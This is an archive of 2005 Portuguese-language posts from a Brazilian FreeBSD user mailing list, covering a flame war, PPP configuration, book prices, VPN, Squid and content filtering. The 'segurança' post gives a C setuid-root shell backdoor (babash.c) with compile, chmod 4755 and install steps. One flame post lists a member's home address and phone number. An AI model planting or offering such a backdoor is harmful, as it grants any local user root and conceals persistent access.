RES: [FUG-BR] Failover em placas de rede - NO FLAMES
Pessoal, Deixem o assunto morrer! O Thiago teve um problema, pessoas deram soluções diferentes usando pontos de vistas também diferentes e foi só. Ninguém precisa dessa discussão toda! Nem de ficar tentando mostrar que sabe mais que o outro e vice versa ... A lista foi feita pra unir e não pra rachar em partes. Façam o que todos pregam mas poucos realmente seguem e não criem Flames! Daqui a pouco seremos moderados, ai fica pior! Alexandre -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Christopher Giese - iRapida Telecom Enviada em: terça-feira, 26 de julho de 2005 11:17 Para: Lista de discussao do grupo FUG-BR Assunto: Re: [FUG-BR] Failover em placas de rede Soh para usa informacao SABIXAO uso Solaris / AIX desde 1995 Linux desde 1996 FreeBSD desde 1997 Desenvolvi o projeto HBSD (FreeBSD em Floppy com features de firewall / QOS / router / nat, etc) - Baseado em PicoBSD (e forneci a comunidade) E acabo de desenvolver o projeto FHBSD (Flash 32 megas com freebsd 5.4 com features alem da conta) - E estou para fornecer para a comunidade Participo desta lista a muitos anos.. Posso quem sabe ter sido um pouco GROSSO com o email que mandei para o marcelo. mas nao vai ser qq muleke (como vc) que vai me fazer passar raiva na frente de amigos de tanta data Qq coisa eu Moro em Cianorte. Rua Jose Bonifacio, 1201 ... meu celular eh 044 9103 1986 e vou estar COM CERTEZA no BSDDAY atenciosamente Christopher Giese SkyWarrior [EMAIL PROTECTED] Pablo Sánchez wrote: Utilizo CARP a mais de 6 meses Então você saberia que daria para utilizar, mesmo não sendo o ideal tenho muitos servidores implementados com solucoes em CARP Que bom. e CARP na minha opiniao eh uma das melhores ferramentas do GENERO ja desenvolvidas (de longe no vrrp) Um ponto de acordo Sobre todo o tumulto... veja bem que nao dei a paulada DIRETAMENTE no Marcelo ele serviu apenas de cobaia falei sobre A MUITO NA LISTA pessoas estarem respondendo assuntos dos quais nao tem conhecimento e ao invez de somar acabam apenas nao resolvendo e sim aumentando o trabalho de leitura dos que querem resolver Esse tipo de coisa acontece. E o ideal é você mostrar qual é a solução correta, e não dizer que a pessoa está errada e só. Não tem problema você dizer Marcelo, me desculpa mas acho que você está errado. A solução mais apropriada seria x Agora... se isto esta causando tanto problema assim.. e se essa opiniao for apenas minha... tudo bem. retiro o que disse. (nao que eu nao ache isso... mesmo pq minha opiniao continua a mesma. vou apenas retirar para nao causar flames aki na lista) Eu não discordo de você que isso acontece, apenas não concordo com a forma tosca como foi colocada. Quase todas as vezes que entra alguma pergunta de PORTE aki. sao os mesmos que respondem (isso quando se tem resposta). pq ultimamente o que tem aparecido sao perguntas feijao com arroz que qq search no google resolveria E quando a pergunta eh de PORTE... de vez em quando tem uma resposta nada haver... de alguem que soh da um tapa rapidao no google e lanca a PEROLA E sempre tem aquele que dá um tapa rapidão na cara de quem deu a resposta, e não propõem nada de diferente. Aliás, nem propõem nada. Sobre meu nome e o da Empresa estarem eh pq como estou na empresa... sai a assinatura. mas com relacao a aparecer... o que me referi foi de escrever emails com solucoes. e nao apenas por escrever.. ... Alguém falou algo sobre a empresa? vamos continuar lendo as menssagens que sao uteis... e descartando o resto :) Existe um ditado que diz se não souber dizer sem ofender, melhor não dizer nunca. Christopher, bacana que você tenha tanto conhecimento. Que bom que você utilize o CARP em sua empresa. Que bom que você tem 6 meses de experiência com isso. Eu tenho 9 anos de software livre, e 8 de desenvolvimento de sistemas em diversas linguagens. Te garanto que deve ter um garoto que começou semana passada que sabe algo que eu não sei. Então, ao invés de contar o tempo, e contar para os outros, ou mandar um e-mail desses: acrescente. Desculpe a todos, sei que a lista não é para este tipo de discussão. Um abc Pablo Santiago Sánchez BSD Professionals www.bsdprofessionals.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
RES: [FUG-BR] PPP ainda...
Usei estas configuraes nom Free 5.0 e esto funcionando: #ppp.linkup # delete ALL add 0 0 HISADDR # PAP delete ALL add 0 0 HISADDR MYADDR: add 0 0 HISADDR #ppp.conf # # PPP Sample Configuration File # Originally written by Toshiharu OHNO # Simplified 5/14/1999 by [EMAIL PROTECTED] # # See /usr/share/examples/ppp/ for some examples # # $FreeBSD: src/etc/ppp/ppp.conf,v 1.2.2.4 2001/02/22 23:28:42 brian Exp $ # default: ident user-ppp VERSION (built COMPILATIONDATE) set device /dev/cuaa1 set speed 57600 set dial ABORT BUSY ABORT NO\\sCARRIER TIMEOUT 20 \\ AT \ OK-AT-OK ATE1Q0 OK \\dATDT\\T TIMEOUT 60 RING ATA CONNECT set redial 5 10 set log Phase Chat LCP IPCP CCP tun command # edit the next three lines and replace the items in caps with # the values which have been assigned by your ISP. PAPouCHAP: set phone 33550133 set login TIMEOUT 10 ogin:--ogin: stooges word: m!0l05** set authname usuario set authkey senha set timeout 30 set openmode active 5 set ifaddr 10.0.0.1/0 10.0.0.2/0 255.255.255.0 delete ALL add 0 0 HISADDR boa sorte Alexandre -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Ricardo Maia Enviada em: tera-feira, 14 de junho de 2005 11:01 Para: Lista de discussao do grupo FUG-BR Assunto: Re: [FUG-BR] PPP ainda... ei, vc pode me mandar o script e sua configuracao de ppp.conf?? Nilton Jose Rizzo wrote: Ricardo Maia wrote: -meu modem eh um lucent winmodem v92, que na versao 5.3 rodava perfeitinho com o driver ltmdm na interface tun0. -ele eh reconhecido e carregado pelo sistema de modo automatico. a propria instalacao identifica o modem. -ja recompilei o sistema, ja recompilei o modulo ppp, ja fiz tudo, e nao deu em nada Algum tem esta configuraco (FreeBSD 5.4 + Lucent Winmodem) funcionando sem problemas? Eu mas e um V90 e o modulo ltmdm e carregado apos o boot em um script no /usr/local/etc/rc.d Rizzo ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
RES: RES: [FUG-BR] Livro
A série Cisco Press lançou vários títulos pra se aprender trabalhar com o produto deles, um exemplo é o Managing Cisco Network Security. Este livro, quando foi lançado, custava 129,90, e eu comprei na Bienal do ano passado por 20,00 na estande da própria editora ... Imagina a revolta de quem comprou esse livro no lançamento ... Acho que esse tema é muito pertinente ... Alguém poderia avisar as editoras sobre os locais onde os profissionais que sabem do assunto estão? Poderíamos ajudar na revisão ... Um abraço Alexandre -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Georges Kormikiaris Enviada em: quarta-feira, 8 de junho de 2005 15:11 Para: Lista de discussao do grupo FUG-BR Assunto: Re: RES: [FUG-BR] Livro On 08 de jun de 2005, at 13:55, Augusto, Alexandre wrote: Oi Georges, Beleza Alexandre, Concordo quando vc fala sobre a pirataria e custo de impressão, mas: 1- a maioria das empresas não tem controle sobre material impresso, e os usuários (nós) abusamos. Isso não mostra a realidade do custo. Eu particularmente prefiro comprar!!!, se alguém fosse imprimir em jato de tinta, certamente preferiria também (é mais barato) Bom, mas aí é o fim da picada, né? O cara rouba o editor e a empresa em que trabalha. Depois querem falar mal dos políticos... 2- Existe um problema enorme nas traduções brasileiras e enquanto as editoras não investirem em revisões técnicas com pessoas envolvidas com o tema, o conteúdo dos livros continuará perdendo a qualidade. Concordo plenamente. O problema é que enquanto a Oreilly tem dezenas de geeks trabalhando pra ela, aqui no Brasil os editores de livros de informática em sua maioria absoluta não vieram desse meio, mas do mercado livreiro tradicional (literatura, humanidades, quando muito, da área de negócios). Tradutores juramentados não entendem de informática, e isso não vai mudar. Nenhum tradutor público (a tradução é juramentada, mas a profissão é tradutor público) trabalha pra editora de informática. Uma lauda de tradução juramentada custa no mínimo 25 reais (sou tradutor público...). As editoras de informática pagam menos de 10 reais por lauda... Já chegaram a me oferecer 3 reais por lauda de livro de negócios... Eu realmente me envergonho com a quantidade de pirataria de publicações, mas não podemos deixar de lembrar os valores dos livros no Brasil. Esse é um debate que não acaba nunca: o livro é caro ou o brasileiro é pobre? Ou os dois? Se quiser saber o que as mais recentes pesquisas pensam a respeito tem um e-book grátis sobre o tema disponível no BNDES: http://www.bndes.gov.br/conhecimento/publicacoes/catalogo/ebook.asp Eu preciso comprar 1 livro e não o faço pois acho um absurdo uma publicação custar 400,00 (ITIL Application Management Book). Realmente, muito caro. Mas não me diga que é o preço médio dos livros, né? Esse é um título da Coroa Britânica... E o pior e ver que o mesmo livro que vc comprou por 300,00, dapois de um ano ele está sendo vendido numa feira por 40,00. De onde se conclui que o business deles não é edição de livros, nenhum editor faria isso com o seu produto. Onde está a seriedade do editor ?, o custo era alto o bastante na hora da publicação e depois passou a inexistir levando o custo a 10% do inicial? Eles não são editores, são da Câmara de Comércio Britãnica... Quem se lembra da famosa série Cisco press ? Que fim levou? O Dominando BSD tem um preço justo!, mas acredito que se tivessem investido mais um pouquinho na qualidade da tradução e cobrassem 10,00 a mais por exemplar, ficaríamos todos felizes. Enquanto não entrar gente do meio técnico nas editoras (como tradutor, revisor, editor, etc), o mercado vai continuar trabalhando na base do custo-benefício. Eles pensam assim: se qualquer mané acha que sabe inglês, se a demanda por livros técnicos é grande, porque vou pagar tradutor técnico de qualidade, revisor, etc? Infelizmente é assim que se pensa, mas não é só no meio editorial não, cadê a indústria do disco? Vendendo cd a 5 reais nos calçadões do centro... E por aí vai (as mesmas reclamações do pessoal aqui na lista sobre os zé-ruelas que aceitam mixaria pelos serviços, etc, etc). Voltando ao meu ponto: será que é um sonho muito doido meu querer implantar uma linha técnica com a qualidade da Oreilly no Brasil? Tô começando a achar que sim... Acho que temos vários culpados, mas o consumidor ainda está no prejuízo. Como já disseram antes de mim: só no forevis (é rir pra não chorar -:) []'s Georges ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
RES: [FUG-BR] Solução VPN
Oi Flávio, 1. Preciso de uma VPN que autentica os clientes windows via dialup. Re: http://www.poptop.org/ 2. Preciso de uma VPN que interlige dois gateways. Re: http://freebsd.ag.com.br/sessao10_8_b.html boa sorte Alexandre -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Flávio Barros Enviada em: quinta-feira, 19 de maio de 2005 14:26 Para: [EMAIL PROTECTED]; [EMAIL PROTECTED]; debian-user-portuguese@lists.debian.org; freebsd@fug.com.br; [EMAIL PROTECTED]; slack-users@linuxmag.com.br Assunto: [FUG-BR] Solução VPN Tenho duas situações. 1. Preciso de uma VPN que autentica os clientes windows via dialup. 2. Preciso de uma VPN que interlige dois gateways. Quais soluções VPN vcs acham mais recomendadas em cada situação acima ? ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
RES: [FUG-BR] Problema com Squid
Baixa o squid e tenta um: netstat -na |grep -i listen |grep 3128 se aparecer algum pid é pq tem alguém ocupando essa porta. Alexandre -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Anderson Sartori Enviada em: sexta-feira, 20 de maio de 2005 15:14 Para: Lista de discussao do grupo FUG-BR Assunto: [FUG-BR] Problema com Squid Pessoal To implementando proxy transparente com o Squid, mas nao to dando certo Ocorre o erro: (squid): Cannot open HTTP Port , ao iniciar o squid. Estou usando a porta default 3128. Verifiquei que ele ta rodando como usuário squid Tenho FreeBSD 5.3 e apache. Já to perdendo os cabelo. Valeu Anderson ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
RES: [FUG-BR] Problema com Squid
Oi, Então vc tem um processo usando essa porta Tente usar o lsof pra ver qual processo está mantendo essa porta aberta lsof |grep squid ai vc pega o PID que aparecer ai, procura ele com o os e dah um kill no garoto. Depois vc sobe seu squid dinovo Boa sorte Alexandre -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Anderson Sartori Enviada em: sexta-feira, 20 de maio de 2005 16:47 Para: Lista de discussao do grupo FUG-BR Assunto: RES: [FUG-BR] Problema com Squid Tem somente isso: Tcp40 0 *.3128 *.* LISTEN Anderson -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Augusto, Alexandre Enviada em: sexta-feira, 20 de maio de 2005 16:30 Para: Lista de discussao do grupo FUG-BR Assunto: RES: [FUG-BR] Problema com Squid Baixa o squid e tenta um: netstat -na |grep -i listen |grep 3128 se aparecer algum pid é pq tem alguém ocupando essa porta. Alexandre -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Anderson Sartori Enviada em: sexta-feira, 20 de maio de 2005 15:14 Para: Lista de discussao do grupo FUG-BR Assunto: [FUG-BR] Problema com Squid Pessoal To implementando proxy transparente com o Squid, mas nao to dando certo Ocorre o erro: (squid): Cannot open HTTP Port , ao iniciar o squid. Estou usando a porta default 3128. Verifiquei que ele ta rodando como usuário squid Tenho FreeBSD 5.3 e apache. Já to perdendo os cabelo. Valeu Anderson ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
RES: [FUG-BR] Alternativa ao Squid
Oi João, Depois de penar muito com Squid, NS-Proxy e outros eu cheguei a conclusão que o melhor filtro de conteúdo é a política de controle de acesso. Uma coisa simples assim: O funcionário não deve usar a infra-estrutura da empresa para manter contato com assuntos que não estão ligados diretamente ao negócio da mesma. Ao descumprir esta diretiva, o funcionário pode sofrer as penalidades previstas no estatuto da empresa que vão desde advertência até a demissão. Isso sim funciona, porquê o medo de perder o emprego faz o cara parar de acessar conteúdo impróprio. O filtro se burla no dia a dia, e os sites estão cada vez mais difíceis de bloquear devido a quantidade de endereços. Um abraço e boa sorte Alexandre -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Joao Rocha Braga Filho Enviada em: quarta-feira, 18 de maio de 2005 15:29 Para: Lista de discussao do grupo FUG-BR Assunto: Re: [FUG-BR] Alternativa ao Squid Um detalhe, que eu saiba, o dansguardian é para trabalhar com o squid, resolvendo as limitações dele. João Rocha. On 5/17/05, Mauro Felipe [EMAIL PROTECTED] wrote: Dansguardian http://dansguardian.org/ Funciona que é uma beleza! Abraços, Mauro Felipe --- Renata Adriana Gazzi [EMAIL PROTECTED] escreveu: Olá povo!! Alguém conhece um filtro de conteúdo web bom (não o Squid, por favor!!) pra pôr em produção com o Free? Já sofri demais com as limitações do Squid e quero experimentar algo novo e realmente funcional. Brigadinha, pessoal!! - This mail sent through IMP: http://horde.org/imp/ ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br __ Converse com seus amigos em tempo real com o Yahoo! Messenger http://br.download.yahoo.com/messenger/ ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br -- [EMAIL PROTECTED] [EMAIL PROTECTED] http://www.goffredo.eti.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
RES: [FUG-BR] segurança
Oi pessoal,
Tentem isso:
vi babash.c
#include stdlib.h
main () {
setuid(0);
system(/bin/bash);
}
/usr/local/bin/gcc babash.c -o babash
chmod 4755 babash
mv babash /usr/bin/babash
Não me lembro quem escreveu esse brinquedo. Não fui eu pois meu conhecimento
em C é pobre...
Tem rodado em maquinas solaris 8, 9 e Linux...
Ainda não rodei no BSD ...
Abraço
-Mensagem original-
De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome
de Celso Viana
Enviada em: sexta-feira, 8 de abril de 2005 10:12
Para: Lista de discussao do grupo FUG-BR
Assunto: Re: [FUG-BR] segurança
sim.. uso secure level 2
o cenário seria esse: tendo acabado de instalar o OS, instalei um
software que tem uma falha de segurança e eu não sei disso;
essa máquina está visível para o mundo (ip real);
essa máquina ainda não foi atualizada;
o OS está em secure level 2;
minha dúvida: imaginemos que alguém, nesse momento, descobriu essa
máquina e resolva explorar essa vulnerabilidade e tenha ganhado acesso
root; eu, estando logado no console, posso identificar esse invasor?
ele está visível para os comandos do sistema? é possível fazer com que
o sistema emita um alarme qdo esse invasor consiga o acesso?
Celso
Celso
On Apr 8, 2005 9:59 AM, Christopher Giese - IRAPIDA
[EMAIL PROTECTED] wrote:
depende
vc usa secure level kernel
pq se nao usa ele pode colocar um rootkit facilmente em sue sistema :)
Celso Viana wrote:
all,
Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD,
ganhando acesso root, esse alguém fica totalmente invisível? ou os
comandos w, who, etc identificam o invasor?
Celso
___
Freebsd mailing list
Freebsd@fug.com.br
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
___
Freebsd mailing list
Freebsd@fug.com.br
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
___
Freebsd mailing list
Freebsd@fug.com.br
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
___
Freebsd mailing list
Freebsd@fug.com.br
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
